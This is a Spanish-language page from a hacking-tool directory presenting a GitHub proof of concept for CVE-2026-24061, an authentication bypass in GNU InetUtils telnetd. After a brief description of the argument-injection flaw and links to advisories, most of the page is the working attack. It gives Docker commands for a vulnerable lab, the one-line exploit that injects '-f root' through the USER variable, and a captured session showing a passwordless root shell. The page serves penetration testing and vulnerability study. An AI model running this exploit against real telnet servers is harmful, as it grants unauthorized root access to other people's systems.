Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24061 — GNU telnetd servicio de GNU InetUtils omisión de autenticación | Kitploit
Herramientas/GitHubGitHub/typeconfused/cve-2026-24061
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubtypeconfused/cve-2026-24061

CVE-2026-24061

GNU telnetd servicio de GNU InetUtils omisión de autenticación

Ver Repositorio
hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Bypass de Autenticación por Inyección de Argumentos en GNU InetUtils telnetd (CVE-2026-24061)

En enero de 2026, se descubrió que el servicio GNU telnetd de GNU InetUtils era vulnerable a un bypass de autenticación por Kyu Neushwaistein (alias Carlos Cortes Alvarez). Registrada como CVE-2026-24061, esta falla permite a un atacante establecer una sesión Telnet sin proporcionar credenciales válidas, otorgando acceso no autorizado al sistema objetivo. La vulnerabilidad existe hasta la versión 2.7-2 del servicio GNU telnetd y parece sacada directamente de los años 90.

Esta es una vulnerabilidad de inyección de argumentos (CWE-88) con una puntuación CVSS v3.1 de 9.8 (Crítica).

Referencias:

  • https://www.openwall.com/lists/oss-security/2026/01/20/2
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24061
  • https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/
  • https://github.com/SafeBreach-Labs/CVE-2026-24061

Entorno Vulnerable

Compilar y ejecutar:

root@kitploit:~
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061

Después de que el servicio se inicie, telnetd estará escuchando en el puerto 23.

Explotación

La vulnerabilidad permite omitir la autenticación inyectando el indicador -f en la variable de entorno USER. Cuando telnetd recibe un nombre de usuario que comienza con -f, lo pasa al programa de inicio de sesión, que interpreta -f como un indicador para omitir la autenticación.

Use el siguiente comando para explotar esta vulnerabilidad y obtener acceso root:

root@kitploit:~
# Cliente Linux (requiere la opción -a)
USER="-f root" telnet -a 127.0.0.1 23

# Cliente macOS (no se necesita la opción -a)
USER="-f root" telnet 127.0.0.1 23

Después de una explotación exitosa, tendrá acceso a un shell root sin proporcionar una contraseña.

root@kitploit:~
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)

Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)
Descargar herramienta